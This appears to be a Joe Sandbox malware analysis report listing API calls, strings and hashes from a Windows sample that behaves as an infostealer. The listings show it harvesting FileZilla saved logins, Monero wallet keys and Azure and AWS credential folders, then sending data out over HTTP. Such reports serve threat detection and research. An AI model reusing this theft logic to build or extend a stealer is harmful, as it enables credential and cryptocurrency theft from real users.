                                    • API String ID: 2068576380-0
                                    • Opcode ID: 334677464a12483293dabf596d260c66b3e1a5072cdb909e63fccb5b3da142f9
                                    • Instruction ID: f155187e66e002e555a49be273a02d6eb1271ca3d6528b675345f5d314a65636
                                    • Opcode Fuzzy Hash: 334677464a12483293dabf596d260c66b3e1a5072cdb909e63fccb5b3da142f9
                                    • Instruction Fuzzy Hash: 5D11E8B4A01209DFCB05DFA8D985AAE77B9FB88300F108559E81597390D770AE10CB61
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: +(on$ta$l"Q
                                    • API String ID: 0-3849359154
                                    • Opcode ID: 0205d8d6bf4500f7651279ff2d02694354401a4a727fc1fc01a83f9e73778903
                                    • Instruction ID: 76900a37c9aa4d45f84dec2d09e9966724c356814c3d8501c5cc5e158a11f5df
                                    • Opcode Fuzzy Hash: 0205d8d6bf4500f7651279ff2d02694354401a4a727fc1fc01a83f9e73778903
                                    • Instruction Fuzzy Hash: FD414AF3B082109FE3006E2EECC576BB7E6EBD4324F1B463DE68497784D57958058682
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: @S[$F~Z
                                    • API String ID: 0-1815195872
                                    • Opcode ID: a1bddbb795feb2923a8bcfb9cc077c80dbfc0219a2a9d542b2812641e43e9a11
                                    • Instruction ID: fac7081844ed788f75fbe739deba886afa34550cc372458cd7f21f03456ef66f
                                    • Opcode Fuzzy Hash: a1bddbb795feb2923a8bcfb9cc077c80dbfc0219a2a9d542b2812641e43e9a11
                                    • Instruction Fuzzy Hash: 0072F6F3A0C2009FE308AE2DDC8567AF7E9EF94720F16492DEAC4C7744EA7558418796
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ,:?
                                    • API String ID: 0-2368655682
                                    • Opcode ID: 09285659e71c08bfe920bbf170c11abe66f2c015bcdd5f901235e4451636a781
                                    • Instruction ID: ad3228b683b16a945a117376b0620a2a32cfe7bfef2c57689b36066c7ef91d1d
                                    • Opcode Fuzzy Hash: 09285659e71c08bfe920bbf170c11abe66f2c015bcdd5f901235e4451636a781
                                    • Instruction Fuzzy Hash: D77209F360C2009FE704AE2DEC8567AB7E5EF94720F1A893DE6C5C3744EA3598058697
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: U0<
                                    • API String ID: 0-2969675609
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    APIs
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                      • Part of subcall function 000E8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 000E8E0B
                                      • Part of subcall function 000EA920: lstrcpy.KERNEL32(00000000,?), ref: 000EA972
                                      • Part of subcall function 000EA920: lstrcat.KERNEL32(00000000), ref: 000EA982
                                      • Part of subcall function 000EA8A0: lstrcpy.KERNEL32(?,000F0E17), ref: 000EA905
                                      • Part of subcall function 000EA9B0: lstrlen.KERNEL32(?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000EA9C5
                                      • Part of subcall function 000EA9B0: lstrcpy.KERNEL32(00000000), ref: 000EAA04
                                      • Part of subcall function 000EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAA12
                                      • Part of subcall function 000EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000EA7E6
                                      • Part of subcall function 000D99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000D99EC
                                      • Part of subcall function 000D99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 000D9A11
                                      • Part of subcall function 000D99C0: LocalAlloc.KERNEL32(00000040,?), ref: 000D9A31
                                      • Part of subcall function 000D99C0: ReadFile.KERNEL32(000000FF,?,00000000,000D148F,00000000), ref: 000D9A5A
                                      • Part of subcall function 000D99C0: LocalFree.KERNEL32(000D148F), ref: 000D9A90
                                      • Part of subcall function 000D99C0: CloseHandle.KERNEL32(000000FF), ref: 000D9A9A
                                      • Part of subcall function 000E8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 000E8E52
                                    • GetProcessHeap.KERNEL32(00000000,000F423F,000F0DBA,000F0DB7,000F0DB6,000F0DB3), ref: 000E0362
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000E0369
                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 000E0385
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000F0DB2), ref: 000E0393
                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 000E03CF
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000F0DB2), ref: 000E03DD
                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 000E0419
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000F0DB2), ref: 000E0427
                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 000E0463
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000F0DB2), ref: 000E0475
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000F0DB2), ref: 000E0502
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000F0DB2), ref: 000E051A
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000F0DB2), ref: 000E0532
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000F0DB2), ref: 000E054A
                                    • lstrcat.KERNEL32(?,browser: FileZilla), ref: 000E0562
                                    • lstrcat.KERNEL32(?,profile: null), ref: 000E0571
                                    • lstrcat.KERNEL32(?,url: ), ref: 000E0580
                                    • lstrcat.KERNEL32(?,00000000), ref: 000E0593
                                    • lstrcat.KERNEL32(?,000F1678), ref: 000E05A2
                                    • lstrcat.KERNEL32(?,00000000), ref: 000E05B5
                                    • lstrcat.KERNEL32(?,000F167C), ref: 000E05C4
                                    • lstrcat.KERNEL32(?,login: ), ref: 000E05D3
                                    • lstrcat.KERNEL32(?,00000000), ref: 000E05E6
                                    • lstrcat.KERNEL32(?,000F1688), ref: 000E05F5
                                    • lstrcat.KERNEL32(?,password: ), ref: 000E0604
                                    • lstrcat.KERNEL32(?,00000000), ref: 000E0617
                                    • lstrcat.KERNEL32(?,000F1698), ref: 000E0626
                                    • lstrcat.KERNEL32(?,000F169C), ref: 000E0635
                                    • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000F0DB2), ref: 000E068E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                    • API String ID: 1942843190-555421843
                                    APIs
                                      • Part of subcall function 000EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000EA7E6
                                      • Part of subcall function 000D47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 000D4839
                                      • Part of subcall function 000D47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 000D4849
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 000D59F8
                                    • StrCmpCA.SHLWAPI(?,00B81328), ref: 000D5A13
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000D5B93
                                    • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00B812B8,00000000,?,00B80008,00000000,?,000F1A1C), ref: 000D5E71
                                    • lstrlen.KERNEL32(00000000), ref: 000D5E82
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 000D5E93
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000D5E9A
                                    • lstrlen.KERNEL32(00000000), ref: 000D5EAF
                                    • lstrlen.KERNEL32(00000000), ref: 000D5ED8
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 000D5EF1
                                    • lstrlen.KERNEL32(00000000,?,?), ref: 000D5F1B
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 000D5F2F
                                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 000D5F4C
                                    • InternetCloseHandle.WININET(00000000), ref: 000D5FB0
                                    • InternetCloseHandle.WININET(00000000), ref: 000D5FBD
                                    • HttpOpenRequestA.WININET(00000000,00B812A8,?,00B80BD0,00000000,00000000,00400100,00000000), ref: 000D5BF8
                                      • Part of subcall function 000EA9B0: lstrlen.KERNEL32(?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000EA9C5
                                      • Part of subcall function 000EA9B0: lstrcpy.KERNEL32(00000000), ref: 000EAA04
                                      • Part of subcall function 000EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAA12
                                      • Part of subcall function 000EA8A0: lstrcpy.KERNEL32(?,000F0E17), ref: 000EA905
                                      • Part of subcall function 000EA920: lstrcpy.KERNEL32(00000000,?), ref: 000EA972
                                      • Part of subcall function 000EA920: lstrcat.KERNEL32(00000000), ref: 000EA982
                                    • InternetCloseHandle.WININET(00000000), ref: 000D5FC7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                     • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                    • String ID: "$"$------$------$------
                                    • API String ID: 874700897-2180234286
                                    • Opcode ID: d8acc9077b55708ad05849ecc7a08abb52aab44313b5560d4330265490c18388
                                    • Instruction ID: 2ff5ae9d67cd63e0de1cdb6e7982f950d2fc02a89378755e37bdf85a2921c242
                                    • Opcode Fuzzy Hash: d8acc9077b55708ad05849ecc7a08abb52aab44313b5560d4330265490c18388
                                    • Instruction Fuzzy Hash: A5123E71A20158AEDB15EBA1DD95FEEB378BF19700F4141A9B10672093EF303A49CF65
                                    APIs
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                      • Part of subcall function 000EA9B0: lstrlen.KERNEL32(?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000EA9C5
                                      • Part of subcall function 000EA9B0: lstrcpy.KERNEL32(00000000), ref: 000EAA04
                                      • Part of subcall function 000EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAA12
                                      • Part of subcall function 000EA8A0: lstrcpy.KERNEL32(?,000F0E17), ref: 000EA905
                                      • Part of subcall function 000E8B60: GetSystemTime.KERNEL32(000F0E1A,00B80428,000F05AE,?,?,000D13F9,?,0000001A,000F0E1A,00000000,?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000E8B86
                                      • Part of subcall function 000EA920: lstrcpy.KERNEL32(00000000,?), ref: 000EA972
                                      • Part of subcall function 000EA920: lstrcat.KERNEL32(00000000), ref: 000EA982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 000DCF83
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 000DD0C7
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000DD0CE
                                    • lstrcat.KERNEL32(?,00000000), ref: 000DD208
                                    • lstrcat.KERNEL32(?,000F1478), ref: 000DD217
                                    • lstrcat.KERNEL32(?,00000000), ref: 000DD22A
                                    • lstrcat.KERNEL32(?,000F147C), ref: 000DD239
                                    • lstrcat.KERNEL32(?,00000000), ref: 000DD24C
                                    • lstrcat.KERNEL32(?,000F1480), ref: 000DD25B
                                    • lstrcat.KERNEL32(?,00000000), ref: 000DD26E
                                    • lstrcat.KERNEL32(?,000F1484), ref: 000DD27D
                                    • lstrcat.KERNEL32(?,00000000), ref: 000DD290
                                    • lstrcat.KERNEL32(?,000F1488), ref: 000DD29F
                                    • lstrcat.KERNEL32(?,00000000), ref: 000DD2B2
                                    • lstrcat.KERNEL32(?,000F148C), ref: 000DD2C1
                                    • lstrcat.KERNEL32(?,00000000), ref: 000DD2D4
                                    • lstrcat.KERNEL32(?,000F1490), ref: 000DD2E3
                                      • Part of subcall function 000EA820: lstrlen.KERNEL32(000D4F05,?,?,000D4F05,000F0DDE), ref: 000EA82B
                                      • Part of subcall function 000EA820: lstrcpy.KERNEL32(000F0DDE,00000000), ref: 000EA885
                                    • lstrlen.KERNEL32(?), ref: 000DD32A
                                    • lstrlen.KERNEL32(?), ref: 000DD339
                                      • Part of subcall function 000EAA70: StrCmpCA.SHLWAPI(00B79218,000DA7A7,?,000DA7A7,00B79218), ref: 000EAA8F
                                    • DeleteFileA.KERNEL32(00000000), ref: 000DD3B4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                     • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                    • String ID:
                                    • API String ID: 1956182324-0
                                    • Opcode ID: 9dbe5e28bfb2605d2e28e682611592360efadf3c2e1d12ee4cae6314bc049619
                                    • Instruction ID: 41ab86200eb1f2dcf5217c38df5d00acdd5118237894f2dddff86b1e2386144a
                                    • Opcode Fuzzy Hash: 9dbe5e28bfb2605d2e28e682611592360efadf3c2e1d12ee4cae6314bc049619
                                    • Instruction Fuzzy Hash: E6E13A71A10148AFDB05EBA1DD96EEE737CAF1D301F114159F106B60A2DF35BA0ACB62
                                    APIs
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                      • Part of subcall function 000EA920: lstrcpy.KERNEL32(00000000,?), ref: 000EA972
                                      • Part of subcall function 000EA920: lstrcat.KERNEL32(00000000), ref: 000EA982
                                      • Part of subcall function 000EA8A0: lstrcpy.KERNEL32(?,000F0E17), ref: 000EA905
                                      • Part of subcall function 000EA9B0: lstrlen.KERNEL32(?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000EA9C5
                                      • Part of subcall function 000EA9B0: lstrcpy.KERNEL32(00000000), ref: 000EAA04
                                      • Part of subcall function 000EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAA12
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00B7F1D8,00000000,?,000F144C,00000000,?,?), ref: 000DCA6C
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 000DCA89
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 000DCA95
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 000DCAA8
                                    • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 000DCAD9
                                    • StrStrA.SHLWAPI(?,00B7F070,000F0B52), ref: 000DCAF7
                                    • StrStrA.SHLWAPI(00000000,00B7EFF8), ref: 000DCB1E
                                    • StrStrA.SHLWAPI(?,00B7FE80,00000000,?,000F1458,00000000,?,00000000,00000000,?,00B79248,00000000,?,000F1454,00000000,?), ref: 000DCCA2
                                    • StrStrA.SHLWAPI(00000000,00B7FCE0), ref: 000DCCB9
                                      • Part of subcall function 000DC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 000DC871
                                      • Part of subcall function 000DC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 000DC87C
                                    • StrStrA.SHLWAPI(?,00B7FCE0,00000000,?,000F145C,00000000,?,00000000,00B791A8), ref: 000DCD5A
                                    • StrStrA.SHLWAPI(00000000,00B78FA8), ref: 000DCD71
                                      • Part of subcall function 000DC820: lstrcat.KERNEL32(?,000F0B46), ref: 000DC943
                                      • Part of subcall function 000DC820: lstrcat.KERNEL32(?,000F0B47), ref: 000DC957
                                      • Part of subcall function 000DC820: lstrcat.KERNEL32(?,000F0B4E), ref: 000DC978
                                    • lstrlen.KERNEL32(00000000), ref: 000DCE44
                                    • CloseHandle.KERNEL32(00000000), ref: 000DCE9C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                     • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                    • String ID:
                                    • API String ID: 3744635739-3916222277
                                    • Opcode ID: 22333f0ec66a6e215c883da5c7f35933f370f0a4d4680a5018eee32f10cb35ee
                                    • Instruction ID: 375f72a5b5d84c581feea53e0c4099391070211b6ff3db8aaabf36934399ad15
                                    • Opcode Fuzzy Hash: 22333f0ec66a6e215c883da5c7f35933f370f0a4d4680a5018eee32f10cb35ee
                                    • Instruction Fuzzy Hash: 74E10B71A00148AFDB15EBA1DD92FEEB779AF19300F014169F10676193EF307A4ACB66
                                    APIs
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                    • RegOpenKeyExA.ADVAPI32(00000000,00B7C128,00000000,00020019,00000000,000F05B6), ref: 000E83A4
                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 000E8426
                                    • wsprintfA.USER32 ref: 000E8459
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 000E847B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 000E848C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 000E8499
                                      • Part of subcall function 000EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000EA7E6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                     • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenlstrcpy$Enumwsprintf
                                    • String ID: - $%s\%s
                                    • API String ID: 3246050789-1643714437
                                    • Opcode ID: 1ab681ab0857d5091a78c7468fdb9eab9f5e89da8d4df52f5cb1c0e3636ad9dc
                                    • Instruction ID: 75f08afd5ddfe863e022840b8706ee9ff90b428cf286d07a70327f73669b13a9
                                    • Opcode Fuzzy Hash: 1ab681ab0857d5091a78c7468fdb9eab9f5e89da8d4df52f5cb1c0e3636ad9dc
                                    • Instruction Fuzzy Hash: E7812A71911158AFEB25DB51CD91FEAB7B8BF08700F00C299E109A6191DF706B89CFA1
                                    APIs
                                      • Part of subcall function 000E8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 000E8E0B
                                    • lstrcat.KERNEL32(?,00000000), ref: 000E4DB0
                                    • lstrcat.KERNEL32(?,\.azure\), ref: 000E4DCD
                                      • Part of subcall function 000E4910: wsprintfA.USER32 ref: 000E492C
                                      • Part of subcall function 000E4910: FindFirstFileA.KERNEL32(?,?), ref: 000E4943
                                    • lstrcat.KERNEL32(?,00000000), ref: 000E4E3C
                                    • lstrcat.KERNEL32(?,\.aws\), ref: 000E4E59
                                      • Part of subcall function 000E4910: StrCmpCA.SHLWAPI(?,000F0FDC), ref: 000E4971
                                      • Part of subcall function 000E4910: StrCmpCA.SHLWAPI(?,000F0FE0), ref: 000E4987
                                      • Part of subcall function 000E4910: FindNextFileA.KERNEL32(000000FF,?), ref: 000E4B7D
                                      • Part of subcall function 000E4910: FindClose.KERNEL32(000000FF), ref: 000E4B92
                                    • lstrcat.KERNEL32(?,00000000), ref: 000E4EC8
                                    • lstrcat.KERNEL32(?,\.IdentityService\), ref: 000E4EE5
                                      • Part of subcall function 000E4910: wsprintfA.USER32 ref: 000E49B0
                                      • Part of subcall function 000E4910: StrCmpCA.SHLWAPI(?,000F08D2), ref: 000E49C5
                                      • Part of subcall function 000E4910: wsprintfA.USER32 ref: 000E49E2
                                      • Part of subcall function 000E4910: PathMatchSpecA.SHLWAPI(?,?), ref: 000E4A1E
                                      • Part of subcall function 000E4910: lstrcat.KERNEL32(?,00B812C8), ref: 000E4A4A
                                      • Part of subcall function 000E4910: lstrcat.KERNEL32(?,000F0FF8), ref: 000E4A5C
                                      • Part of subcall function 000E4910: lstrcat.KERNEL32(?,?), ref: 000E4A70
                                      • Part of subcall function 000E4910: lstrcat.KERNEL32(?,000F0FFC), ref: 000E4A82
                                      • Part of subcall function 000E4910: lstrcat.KERNEL32(?,?), ref: 000E4A96
                                      • Part of subcall function 000E4910: CopyFileA.KERNEL32(?,?,00000001), ref: 000E4AAC
                                      • Part of subcall function 000E4910: DeleteFileA.KERNEL32(?), ref: 000E4B31
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                     • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
